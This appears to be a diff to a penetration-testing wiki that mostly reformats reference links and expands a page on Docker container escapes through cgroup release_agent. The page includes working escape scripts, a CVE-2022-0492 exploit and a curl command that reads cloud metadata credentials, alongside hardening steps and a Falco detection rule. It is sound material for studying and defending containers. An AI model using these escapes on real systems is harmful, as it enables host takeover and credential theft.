diff --git a/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md b/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md index a7b5f902f74..42cfcb0eb67 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md @@ -57,7 +57,7 @@ This approach avoids direct file downloads and leverages familiar UI elements to ## References -- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/ -- Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link +- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – [https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/](https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/) +- Discord Custom Invite Link Documentation – [https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link](https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md index c6241162e18..1274029121c 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md @@ -4,7 +4,9 @@ **For further details, refer to the** [**original blog post**](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)**.** This is just a summary: -Original PoC: +--- + +## Classic PoC (2019) ```shell d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` @@ -14,51 +16,112 @@ touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o ``` -The proof of concept (PoC) demonstrates a method to exploit cgroups by creating a `release_agent` file and triggering its invocation to execute arbitrary commands on the container host. Here's a breakdown of the steps involved: +The PoC abuses the **cgroup-v1** `release_agent` feature: when the last task of a cgroup that has `notify_on_release=1` exits, the kernel (in the **initial namespaces on the host**) executes the program whose pathname is stored in the writable file `release_agent`. Because that execution happens with **full root privileges on the host**, gaining write access to the file is enough for a container escape. -1. **Prepare the Environment:** - - A directory `/tmp/cgrp` is created to serve as a mount point for the cgroup. - - The RDMA cgroup controller is mounted to this directory. In case of absence of the RDMA controller, it's suggested to use the `memory` cgroup controller as an alternative. +### Short, readable walk-through -```shell -mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x -``` +1. **Prepare a new cgroup** -2. **Set Up the Child Cgroup:** - - A child cgroup named "x" is created within the mounted cgroup directory. - - Notifications are enabled for the "x" cgroup by writing 1 to its notify_on_release file. + ```shell + mkdir /tmp/cgrp + mount -t cgroup -o rdma cgroup /tmp/cgrp # or –o memory + mkdir /tmp/cgrp/x + echo 1 > /tmp/cgrp/x/notify_on_release + ``` -```shell -echo 1 > /tmp/cgrp/x/notify_on_release -``` +2. **Point `release_agent` to attacker-controlled script on the host** -3. **Configure the Release Agent:** - - The path of the container on the host is obtained from the /etc/mtab file. - - The release_agent file of the cgroup is then configured to execute a script named /cmd located at the acquired host path. + ```shell + host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab) + echo "$host_path/cmd" > /tmp/cgrp/release_agent + ``` -```shell -host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` -echo "$host_path/cmd" > /tmp/cgrp/release_agent -``` +3. **Drop the payload** -4. **Create and Configure the /cmd Script:** - - The /cmd script is created inside the container and is configured to execute ps aux, redirecting the output to a file named /output in the container. The full path of /output on the host is specified. + ```shell + cat <<'EOF' > /cmd +#!/bin/sh +ps aux > "$host_path/output" +EOF + chmod +x /cmd + ``` -```shell -echo '#!/bin/sh' > /cmd -echo "ps aux > $host_path/output" >> /cmd -chmod a+x /cmd -``` +4. **Trigger the notifier** -5. **Trigger the Attack:** - - A process is initiated within the "x" child cgroup and is immediately terminated. - - This triggers the `release_agent` (the /cmd script), which executes ps aux on the host and writes the output to /output within the container. + ```shell + sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" # add ourselves and immediately exit + cat /output # now contains host processes + ``` -```shell -sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" +--- + +## 2022 kernel vulnerability – CVE-2022-0492 + +In February 2022 Yiqi Sun and Kevin Wang discovered that **the kernel did *not* verify capabilities when a process wrote to `release_agent` in cgroup-v1** (function `cgroup_release_agent_write`). + +Effectively **any process that could mount a cgroup hierarchy (e.g. via `unshare -UrC`) could write an arbitrary path to `release_agent` without `CAP_SYS_ADMIN` in the *initial* user namespace**. On a default-configured, root-running Docker/Kubernetes container this allowed: + +* privilege escalation to root on the host; ↗ +* container escape without the container being privileged. + +The flaw was assigned **CVE-2022-0492** (CVSS 7.8 / High) and fixed in the following kernel releases (and all later): + +* 5.16.2, 5.15.17, 5.10.93, 5.4.176, 4.19.228, 4.14.265, 4.9.299. + +Patch commit: `1e85af15da28 "cgroup: Fix permission checking"`. + +### Minimal exploit inside a container + +```bash +# prerequisites: container is run as root, no seccomp/AppArmor profile, cgroup-v1 rw inside +apk add --no-cache util-linux # provides unshare +unshare -UrCm sh -c ' + mkdir /tmp/c; mount -t cgroup -o memory none /tmp/c; + echo 1 > /tmp/c/notify_on_release; + echo /proc/self/exe > /tmp/c/release_agent; # will exec /bin/busybox from host + (sleep 1; echo 0 > /tmp/c/cgroup.procs) & + while true; do sleep 1; done +' +``` +If the kernel is vulnerable the busybox binary from the *host* executes with full root. + +### Hardening & Mitigations + +* **Update the kernel** (≥ versions above). The patch now requires `CAP_SYS_ADMIN` in the *initial* user namespace to write to `release_agent`. +* **Prefer cgroup-v2** – the unified hierarchy **removed the `release_agent` feature completely**, eliminating this class of escapes. +* **Disable unprivileged user namespaces** on hosts that do not need them: + ```shell + sysctl -w kernel.unprivileged_userns_clone=0 + ``` +* **Mandatory access control**: AppArmor/SELinux policies that deny `mount`, `openat` on `/sys/fs/cgroup/**/release_agent`, or drop `CAP_SYS_ADMIN`, stop the technique even on vulnerable kernels. +* **Read-only bind-mask** all `release_agent` files (Palo Alto script example): + ```shell + for f in $(find /sys/fs/cgroup -name release_agent); do + mount --bind -o ro /dev/null "$f" + done + ``` + +## Detection at runtime + +[`Falco`](https://falco.org/) ships a built-in rule since v0.32: + +```yaml +- rule: Detect release_agent File Container Escapes + desc: Detect an attempt to exploit a container escape using release_agent + condition: open_write and container and fd.name endswith release_agent and + (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and + thread.cap_effective contains CAP_SYS_ADMIN + output: "Potential release_agent container escape (file=%fd.name user=%user.name cap=%thread.cap_effective)" + priority: CRITICAL + tags: [container, privilege_escalation] ``` -{{#include ../../../../banners/hacktricks-training.md}} +The rule triggers on any write attempt to `*/release_agent` from a process inside a container that still wields `CAP_SYS_ADMIN`. + +## References +* [Unit 42 – CVE-2022-0492: container escape via cgroups](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/) – detailed analysis and mitigation script. +* [Sysdig Falco rule & detection guide](https://sysdig.com/blog/detecting-mitigating-cve-2022-0492-sysdig/) +{{#include ../../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/network-services-pentesting/1099-pentesting-java-rmi.md b/src/network-services-pentesting/1099-pentesting-java-rmi.md index 5783a81f2b8..77e552d4eb6 100644 --- a/src/network-services-pentesting/1099-pentesting-java-rmi.md +++ b/src/network-services-pentesting/1099-pentesting-java-rmi.md @@ -86,7 +86,7 @@ $ rmg enum 172.17.0.2 9010 [+] [+] RMI server codebase enumeration: [+] -[+] - http://iinsecure.dev/well-hidden-development-folder/ +[+] - [http://iinsecure.dev/well-hidden-development-folder/](http://iinsecure.dev/well-hidden-development-folder/) [+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub [+] --> de.qtc.rmg.server.interfaces.IPlainServer [+] @@ -254,8 +254,8 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub [+] - javax.management.remote.rmi.RMIConnection newClient(Object params) [+] [+] References: -[+] - https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html -[+] - https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi +[+] - [https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html](https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html) +[+] - [https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi](https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi) [+] [+] Vulnerabilities: [+] @@ -269,7 +269,7 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub [+] is therefore most of the time equivalent to remote code execution. [+] [+] References: -[+] - https://github.com/qtc-de/beanshooter +[+] - [https://github.com/qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) [+] [+] ----------------------------------- [+] Name: @@ -282,7 +282,7 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub [+] establish a working JMX connection, you can also perform deserialization attacks. [+] [+] References: -[+] - https://github.com/qtc-de/beanshooter +[+] - [https://github.com/qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) ``` ## Shodan @@ -316,4 +316,3 @@ Entry_1: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/2375-pentesting-docker.md b/src/network-services-pentesting/2375-pentesting-docker.md index e3726df2703..99db0ebeea2 100644 --- a/src/network-services-pentesting/2375-pentesting-docker.md +++ b/src/network-services-pentesting/2375-pentesting-docker.md @@ -163,7 +163,7 @@ curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq #List processes inside a container curl –insecure https://tlsopen.docker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq #Set up and exec job to hit the metadata URL -curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}' +curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- [http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'] #Get the output curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}' # list secrets (no secrets/swarm not set up) @@ -337,4 +337,3 @@ You can use auditd to monitor docker. {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/joomla.md b/src/network-services-pentesting/pentesting-web/joomla.md index 8ae5dcf8322..efda84aa843 100644 --- a/src/network-services-pentesting/pentesting-web/joomla.md +++ b/src/network-services-pentesting/pentesting-web/joomla.md @@ -65,7 +65,7 @@ curl https://www.joomla.org/ | grep Joomla | grep generator 1- What is this? * This is a Joomla! installation/upgrade package to version 3.x * Joomla! Official site: https://www.joomla.org - * Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history + * Joomla! 3.9 version history - [https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history](https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history) * Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging ``` @@ -124,4 +124,3 @@ If you managed to get **admin credentials** you can **RCE inside of it** by addi {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/moodle.md b/src/network-services-pentesting/pentesting-web/moodle.md index ac6bf5f4fa0..8375e6ce572 100644 --- a/src/network-services-pentesting/pentesting-web/moodle.md +++ b/src/network-services-pentesting/pentesting-web/moodle.md @@ -21,8 +21,8 @@ droopescan scan moodle -u http://moodle.example.com// 3.10.0-beta [+] Possible interesting urls found: - Static readme file. - http://moodle.schooled.htb/moodle/README.txt - Admin panel - http://moodle.schooled.htb/moodle/login/ +Static readme file. - [http://moodle.schooled.htb/moodle/README.txt](http://moodle.schooled.htb/moodle/README.txt) +Admin panel - [http://moodle.schooled.htb/moodle/login/](http://moodle.schooled.htb/moodle/login/) [+] Scan finished (0:00:05.643539 elapsed) ``` diff --git a/src/todo/radio-hacking/low-power-wide-area-network.md b/src/todo/radio-hacking/low-power-wide-area-network.md index e33e95c6278..1ec25f70dfd 100644 --- a/src/todo/radio-hacking/low-power-wide-area-network.md +++ b/src/todo/radio-hacking/low-power-wide-area-network.md @@ -94,6 +94,6 @@ Force SF12/125 kHz to increase airtime → exhaust duty-cycle of gateway (denial ## References -* LoRaWAN Auditing Framework (LAF) – https://github.com/IOActive/laf -* Trend Micro LoRaPWN overview – https://www.hackster.io/news/trend-micro-finds-lorawan-security-lacking-develops-lorapwn-python-utility-bba60c27d57a +* LoRaWAN Auditing Framework (LAF) – [https://github.com/IOActive/laf](https://github.com/IOActive/laf) +* Trend Micro LoRaPWN overview – [https://www.hackster.io/news/trend-micro-finds-lorawan-security-lacking-develops-lorapwn-python-utility-bba60c27d57a](https://www.hackster.io/news/trend-micro-finds-lorawan-security-lacking-develops-lorapwn-python-utility-bba60c27d57a) {{#include ../../banners/hacktricks-training.md}}